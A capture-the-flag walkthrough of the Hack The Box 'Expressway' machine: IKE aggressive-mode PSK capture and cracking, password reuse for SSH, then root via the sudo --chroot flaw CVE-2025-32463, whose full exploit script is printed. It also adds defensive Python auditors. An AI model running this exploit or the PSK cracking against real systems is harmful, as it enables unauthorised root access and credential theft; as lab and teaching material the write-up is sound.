Description
Expressway is an easy Hack The Box machine that features:
- IKE/IPsec server enumeration and PSK recovery
- Password reuse for a Linux user
- Privilege escalation via a vulnerable sudo binary
Footprinting
First, we check with the ping command whether the machine is up and use the TTL to guess its operating system. The target machine IP address is 10.129.62.220.
$ ping -c 3 10.129.62.220
PING 10.129.62.220 (10.129.62.220) 56(84) bytes of data.
64 bytes from 10.129.62.220: icmp_seq=1 ttl=63 time=48.0 ms
64 bytes from 10.129.62.220: icmp_seq=2 ttl=63 time=48.7 ms
64 bytes from 10.129.62.220: icmp_seq=3 ttl=63 time=47.5 ms
--- 10.129.62.220 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2004ms
rtt min/avg/max/mdev = 47.508/48.072/48.719/0.497 ms
The machine is up, and a TTL of 63 (a default of 64 minus one hop) suggests a Linux/Unix host; this is only a heuristic, but the SSH banner later confirms it. Next we run an Nmap TCP SYN scan of the default top 1000 TCP ports to see which are open.
$ sudo nmap 10.129.62.220 -sS -oN nmap_scan
Starting Nmap 7.95 ( https://nmap.org )
Nmap scan report for 10.129.62.220
Host is up (0.049s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
Nmap done: 1 IP address (1 host up) scanned in 1.02 seconds
Only one TCP port, 22, is open. We move on to enumerate UDP ports.
$ sudo nmap 10.129.62.220 -sU --top-ports 100 -oN nmap_scan_udp
Starting Nmap 7.95 ( https://nmap.org )
Nmap scan report for 10.129.62.220
Host is up (0.049s latency).
Not shown: 96 closed udp ports (port-unreach)
PORT STATE SERVICE
68/udp open|filtered dhcpc
69/udp open|filtered tftp
500/udp open isakmp
4500/udp open|filtered nat-t-ike
Nmap done: 1 IP address (1 host up) scanned in 111.76 seconds
UDP port 500 (isakmp) is open, and 4500/udp (IKE NAT traversal) is open|filtered, so this host runs an IKE/IPsec service.
Enumeration
Then we run a more detailed scan of the open ports with service version detection and default scripts.
$ nmap 10.129.62.220 -Pn -sV -sC -p22 -oN nmap_scan_ports
Starting Nmap 7.95 ( https://nmap.org )
Nmap scan report for 10.129.62.220
Host is up (0.048s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 10.0p2 Debian 8 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.58 seconds
$ nmap 10.129.62.220 -Pn -sU -sV -sC -p500 -oN nmap_scan_ports_udp
Starting Nmap 7.95 ( https://nmap.org )
Nmap scan report for 10.129.62.220
Host is up (0.049s latency).
PORT STATE SERVICE VERSION
500/udp open isakmp?
| ike-version:
| attributes:
| XAUTH
|_ Dead Peer Detection v1.0
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 127.98 seconds
We add the expressway.htb host to the /etc/hosts file.
$ echo "10.129.62.220 expressway.htb" | sudo tee -a /etc/hosts
Since we have no credentials for SSH, we enumerate the isakmp service on UDP port 500, which belongs to IPsec. IPsec is a protocol suite that secures IP communications by providing encryption, authentication and integrity. IKE is the protocol used to negotiate and manage the keys and security settings an IPsec connection needs. The service advertises XAUTH authentication and the Cisco Dead Peer Detection v1.0 vendor ID.
Exploitation
From the fingerprint of the IPsec service we find that the Cisco implementation is vulnerable to group name enumeration and PSK retrieval. Because the device returns different responses to different IKE requests, valid group names can be enumerated from the VPN device. With the correct group name the pre-shared key hash can then be captured and a brute-force attack carried out offline. We start with a simple enumeration using the ike-scan tool.
$ ike-scan 10.129.62.220
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.129.62.220 Main Mode Handshake returned HDR=(CKY-R=a8119e135787b4e2) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
Ending ike-scan 1.9.6: 1 hosts scanned in 0.056 seconds (17.93 hosts/sec). 1 returned handshake; 0 returned notify
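The handshake line above already tells a defender most of what matters about this VPN endpoint. The following Python script is an added example, not part of the original write-up or of ike-scan: it parses a handshake line in the format ike-scan prints, extracts the accepted SA attributes and vendor IDs, and flags the settings that should be changed. The sample line is a copy of the one returned above; the weakness rules and their thresholds are this example's own choices.

```python
import re

# Constructed copy of the Main Mode handshake line ike-scan printed above.
SAMPLE_LINE = (
    "10.129.62.220 Main Mode Handshake returned HDR=(CKY-R=a8119e135787b4e2) "
    "SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds "
    "LifeDuration=28800) VID=09002689dfd6b712 (XAUTH) "
    "VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)"
)

HDR_RE = re.compile(r"HDR=\(CKY-R=([0-9a-fA-F]+)\)")
SA_RE = re.compile(r"SA=\(([^)]*)\)")
VID_RE = re.compile(r"VID=([0-9a-fA-F]+) \(([^)]*)\)")


def parse_handshake(line):
    """Split one ike-scan handshake line into host, mode, cookie, SA attributes and VIDs."""
    sa_match = SA_RE.search(line)
    if sa_match is None:
        raise ValueError("no SA payload in line; the peer did not return a handshake")
    attrs = {}
    for token in sa_match.group(1).split():
        key, _, value = token.partition("=")
        attrs[key] = value
    hdr = HDR_RE.search(line)
    return {
        "host": line.split()[0],
        "mode": "aggressive" if "Aggressive Mode" in line else "main",
        "cky_r": hdr.group(1) if hdr else None,
        "sa": attrs,
        # list of (hex vendor id, label ike-scan attached to it)
        "vids": VID_RE.findall(line),
    }


# Weak-setting rules; the thresholds are this example's choices, not ike-scan's.
WEAK_CIPHERS = {"DES", "3DES"}
WEAK_HASHES = {"MD5", "SHA1"}
WEAK_DH_GROUPS = {1, 2, 5}  # modp768, modp1024, modp1536


def audit(parsed):
    """Return the findings a defender should act on for the SA the peer accepted."""
    sa = parsed["sa"]
    findings = []
    if sa.get("Enc") in WEAK_CIPHERS:
        findings.append(f"cipher {sa['Enc']} is deprecated (64-bit block); prefer AES")
    if sa.get("Hash") in WEAK_HASHES:
        findings.append(f"hash {sa['Hash']} is deprecated; prefer SHA-256 or better")
    group_num = sa.get("Group", "").split(":")[0]
    if group_num.isdigit() and int(group_num) in WEAK_DH_GROUPS:
        findings.append(f"DH group {sa['Group']} is too small; prefer group 14 (modp2048) or larger")
    if sa.get("Auth") == "PSK":
        findings.append(
            "PSK authentication: if aggressive mode is enabled the responder hash travels "
            "in the clear and a guessable PSK can be recovered offline; disable aggressive "
            "mode and use a long random PSK or certificates"
        )
    labels = {label for _, label in parsed["vids"]}
    if "XAUTH" in labels and sa.get("Auth") == "PSK":
        findings.append(
            "XAUTH over a group PSK: one secret is shared by every remote-access client, "
            "so it is only as secret as the least careful of them"
        )
    return findings


if __name__ == "__main__":
    parsed = parse_handshake(SAMPLE_LINE)
    print(f"{parsed['host']} ({parsed['mode']} mode) cookie {parsed['cky_r']}")
    for finding in audit(parsed):
        print(" -", finding)
```

Run against the captured line it reports five findings: 3DES, SHA1, a 1024-bit DH group, PSK authentication, and XAUTH on top of a group PSK. A peer that only accepts AES, SHA-2, group 14 or larger and certificate authentication produces an empty list.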
We receive the handshake without problems. Next we try to retrieve the PSK hash using aggressive mode (-A), printing the full payload list (-M) and saving the PSK parameters to the psk.txt file (-P).
$ ike-scan -Ppsk.txt -M -A 10.129.62.220
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.129.62.220 Aggressive Mode Handshake returned
HDR=(CKY-R=330b4480f89ece23)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
KeyExchange(128 bytes)
Nonce(32 bytes)
ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
VID=09002689dfd6b712 (XAUTH)
VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
Hash(20 bytes)
Ending ike-scan 1.9.6: 1 hosts scanned in 0.057 seconds (17.62 hosts/sec). 1 returned handshake; 0 returned notify
$ cat psk.txt
23d4731dc5d297c15ac302616d120cbf61290575c31eb847840c14abd05b0b5e1f7786d25c628759fe89329dff2ad5f6a4ecf806e43152cc3b31bee2b87715fbd74a87a01ddfb6f2114e78e81d82aeb3bad6eb78cacbc1af0ca57ed1686057a6aa941047e3bc9e887664df140899c4a5f0edb2daf645a7f38a09207db5bcc9e7:e25347f451887adb802e621c58f5faedb3cdd0f7dd984a57ecc66f6caaab37c61f5631528870bcbe8e9f18e517b463ba27838a96a7fe768d2445cf1d0e363d7de727a8ff6c064b97f178f01c2fb836156d05dc47db6567c23be418cc9b6fa2de5603d704bb91514f7b0414c649d6df1fb646fc07cf602c77ff157a0bd4998d7b:330b4480f89ece23:262cca0ba2adf846:00000001000000010000009801010004030000240101000080010005800200028003000180040002800b0001000c000400007080030000240201000080010005800200018003000180040002800b0001000c000400007080030000240301000080010001800200028003000180040002800b0001000c000400007080000000240401000080010001800200018003000180040002800b0001000c000400007080:03000000696b6540657870726573737761792e687462:e581237d502897085043cafde718ed93993155ee:497dfccd78ee1f18fc601029d9119092c93e4a54b2c2d9769730a2a0165381d8:0e5c8f90bb99a82f8444b610224dc8883557fcf8
The aggressive mode handshake reveals an IPsec identity, ike@expressway.htb, and the PSK hash together with the parameters needed to verify it. We convert the record to a format John the Ripper understands and crack it.
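To make the psk.txt record readable, here is an added Python example (written for this page, not ike-scan's or John's code). It splits the record into its nine named fields in the order ike-scan documents for its -P output, decodes the identification payload that leaked the ike@expressway.htb identity, and infers the DH group size and hash algorithm from the field lengths. The embedded record is a copy of the one captured above; the ISAKMP identification type names come from RFC 2407.

```python
# Field order ike-scan documents for the file written by -P:
FIELDS = ("g_xr", "g_xi", "cky_r", "cky_i", "sai_b", "idir_b", "ni_b", "nr_b", "hash_r")

# ISAKMP identification types, RFC 2407 section 4.6.2.1.
ID_TYPES = {
    1: "ID_IPV4_ADDR", 2: "ID_FQDN", 3: "ID_USER_FQDN", 4: "ID_IPV4_ADDR_SUBNET",
    5: "ID_IPV6_ADDR", 6: "ID_IPV6_ADDR_SUBNET", 7: "ID_IPV4_ADDR_RANGE",
    8: "ID_IPV6_ADDR_RANGE", 9: "ID_DER_ASN1_DN", 10: "ID_DER_ASN1_GN", 11: "ID_KEY_ID",
}

# Copy of the psk.txt record captured above, split at the colons for readability.
SAMPLE_RECORD = ":".join([
    "23d4731dc5d297c15ac302616d120cbf61290575c31eb847840c14abd05b0b5e"
    "1f7786d25c628759fe89329dff2ad5f6a4ecf806e43152cc3b31bee2b87715fb"
    "d74a87a01ddfb6f2114e78e81d82aeb3bad6eb78cacbc1af0ca57ed1686057a6"
    "aa941047e3bc9e887664df140899c4a5f0edb2daf645a7f38a09207db5bcc9e7",  # g_xr
    "e25347f451887adb802e621c58f5faedb3cdd0f7dd984a57ecc66f6caaab37c6"
    "1f5631528870bcbe8e9f18e517b463ba27838a96a7fe768d2445cf1d0e363d7d"
    "e727a8ff6c064b97f178f01c2fb836156d05dc47db6567c23be418cc9b6fa2de"
    "5603d704bb91514f7b0414c649d6df1fb646fc07cf602c77ff157a0bd4998d7b",  # g_xi
    "330b4480f89ece23",  # cky_r, matches the HDR line printed by ike-scan
    "262cca0ba2adf846",  # cky_i
    "00000001000000010000009801010004"  # DOI, situation, proposal header
    "030000240101000080010005800200028003000180040002800b0001000c000400007080"
    "030000240201000080010005800200018003000180040002800b0001000c000400007080"
    "030000240301000080010001800200028003000180040002800b0001000c000400007080"
    "000000240401000080010001800200018003000180040002800b0001000c000400007080",  # sai_b
    "03000000696b6540657870726573737761792e687462",  # idir_b
    "e581237d502897085043cafde718ed93993155ee",  # ni_b
    "497dfccd78ee1f18fc601029d9119092c93e4a54b2c2d9769730a2a0165381d8",  # nr_b
    "0e5c8f90bb99a82f8444b610224dc8883557fcf8",  # hash_r
])


def parse_psk_record(record):
    """Return the nine fields of one ike-scan PSK record as bytes, keyed by name."""
    parts = record.strip().split(":")
    if len(parts) != len(FIELDS):
        raise ValueError(f"expected {len(FIELDS)} fields, got {len(parts)}")
    return {name: bytes.fromhex(value) for name, value in zip(FIELDS, parts)}


def decode_id(idir_b):
    """Decode an ISAKMP ID payload body: type(1) protocol(1) port(2) data(n)."""
    if len(idir_b) < 4:
        raise ValueError("ID payload shorter than its 4-byte header")
    id_type, data = idir_b[0], idir_b[4:]
    name = ID_TYPES.get(id_type, f"unknown({id_type})")
    if name in ("ID_FQDN", "ID_USER_FQDN"):
        return name, data.decode("ascii")
    if name == "ID_IPV4_ADDR" and len(data) == 4:
        return name, ".".join(str(b) for b in data)
    return name, data.hex()


def summarize(record):
    """What the responder gave away in the clear during the aggressive mode exchange."""
    r = parse_psk_record(record)
    id_type, identity = decode_id(r["idir_b"])
    return {
        "identity_type": id_type,
        "identity": identity,
        "cky_r": r["cky_r"].hex(),
        "cky_i": r["cky_i"].hex(),
        # A 128-byte public value means a 1024-bit modp group (group 2).
        "dh_public_bytes": len(r["g_xr"]),
        "dh_bits": len(r["g_xr"]) * 8,
        # HASH_R is prf(SKEYID, ...); an HMAC-SHA1 output is 20 bytes, HMAC-MD5 is 16.
        "hash_algo": {16: "MD5", 20: "SHA1"}.get(len(r["hash_r"]), "unknown"),
        "hash_r": r["hash_r"].hex(),
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_RECORD).items():
        print(f"{key:16} {value}")
```

Everything needed to check a PSK guess is in this one record: per RFC 2409, SKEYID = prf(PSK, Ni_b | Nr_b) and HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b), and only the PSK is missing. That is why aggressive mode with PSK authentication is an offline-guessing exposure rather than an online one, and why the remediation is to disable aggressive mode or move to certificate authentication rather than to rate-limit the service.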
$ ikescan2john psk.txt > psk.hash
$ john --wordlist=/usr/share/wordlists/rockyou.txt psk.hash
Using default input encoding: UTF-8
Loaded 1 password hash (IKE, PSK [HMAC MD5/SHA1 32/64])
Cost 1 (hash algorithm used for hmac [1:MD5 2:SHA1]) is 2 for all loaded hashes
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
freakingrockstarontheroad (?)
1g 0:00:00:01 DONE 0.8196g/s 6593Kp/s 6593Kc/s 6593KC/s fredjohnson..frazel03
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
We recovered the PSK for the IPsec service: freakingrockstarontheroad. The same password is reused for the ike system account, so we can log in over SSH with the ike username and the recovered PSK.
$ ssh ike@expressway.htb
ike@expressway.htb's password:
...
ike@expressway:~$ id
uid=1001(ike) gid=1001(ike) groups=1001(ike),13(proxy)
Post-Exploitation
The ike user belongs to the proxy group. Listing the accounts that have a login shell, the only other one is root.
ike@expressway:~$ grep sh /etc/passwd
root:x:0:0:root:/root:/bin/bash
sshd:x:101:65534::/run/sshd:/usr/sbin/nologin
ike:x:1001:1001:ike,,,:/home/ike:/bin/bash
Enumerating the sudo version, we find that the system is running 1.9.17.
ike@expressway:~$ sudo --version
Sudo version 1.9.17
Sudoers policy plugin version 1.9.17
Sudoers file grammar version 50
Sudoers I/O plugin version 1.9.17
Sudoers audit plugin version 1.9.17
Sudo before 1.9.17p1 allows local users to obtain root access because /etc/nsswitch.conf from a user-controlled directory is used with the --chroot option (CVE-2025-32463). A proof of concept by kh4sh3i is available on GitHub. We use it to trigger the vulnerability and obtain root permissions.
ike@expressway:~$ cat<<'EXPLOITEND' > /tmp/sudo-chwoot.sh
#!/bin/bash
STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd ${STAGE?} || exit 1
cat > woot1337.c<<EOF
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor)) void woot(void) {
setreuid(0,0);
setregid(0,0);
chdir("/");
execl("/bin/bash", "/bin/bash", NULL);
}
EOF
mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c
echo "woot!"
sudo -R woot woot
rm -rf ${STAGE?}
EXPLOITEND
ike@expressway:~$ bash /tmp/sudo-chwoot.sh
woot!
root@expressway:/# id
uid=0(root) gid=0(root) groups=0(root),13(proxy),1001(ike)
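As the defensive counterpart to the version check above, here is an added Python example (not from the write-up or the PoC) that parses `sudo --version` output and reports whether the installed release falls in the window affected by CVE-2025-32463. The upper bound, 1.9.17p1, is the fix version named above; the lower bound, 1.9.14, is the release that introduced the --chroot option and is a known fact not taken from this page. The sample output is a copy of the one shown above.

```python
import re

# Constructed copy of the `sudo --version` output shown above.
SAMPLE_OUTPUT = """Sudo version 1.9.17
Sudoers policy plugin version 1.9.17
Sudoers file grammar version 50
Sudoers I/O plugin version 1.9.17
Sudoers audit plugin version 1.9.17
"""

# Accepts either the full --version output or a bare "1.9.17p1" string.
VERSION_RE = re.compile(r"(?:Sudo version )?(\d+)\.(\d+)\.(\d+)(?:p(\d+))?")

# 1.9.17p1 is the fix release named in the write-up.
FIXED = (1, 9, 17, 1)
# -R/--chroot did not exist before 1.9.14 (known fact, not from the page),
# so earlier releases cannot reach the vulnerable code path at all.
CHROOT_INTRODUCED = (1, 9, 14, 0)


def parse_version(text):
    """Return (major, minor, patch, plevel); a missing pN suffix counts as p0."""
    m = VERSION_RE.search(text)
    if m is None:
        raise ValueError("no sudo version string found")
    major, minor, patch, plevel = m.groups()
    return (int(major), int(minor), int(patch), int(plevel or 0))


def format_version(v):
    major, minor, patch, plevel = v
    return f"{major}.{minor}.{patch}" + (f"p{plevel}" if plevel else "")


def is_vulnerable(version):
    """True when the chroot option exists and the nsswitch.conf fix is absent."""
    return CHROOT_INTRODUCED <= version < FIXED


def report(text):
    """Summarize one host's sudo --version output for a patch-tracking ticket."""
    v = parse_version(text)
    vulnerable = is_vulnerable(v)
    return {
        "version": format_version(v),
        "cve_2025_32463": "affected" if vulnerable else "not affected",
        "action": f"upgrade to {format_version(FIXED)} or later" if vulnerable else "none",
    }


if __name__ == "__main__":
    for key, value in report(SAMPLE_OUTPUT).items():
        print(f"{key:16} {value}")
```

The version tuple keeps the patch level as a fourth component so that 1.9.17 sorts before 1.9.17p1; a plain string comparison would get this wrong. Feed it the output of `sudo --version` from each host to triage a fleet.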
Flags
From the root shell we can read both the user and the root flag.
root@expressway:/# cat /home/ike/user.txt
<REDACTED>
root@expressway:/# cat /root/root.txt
<REDACTED>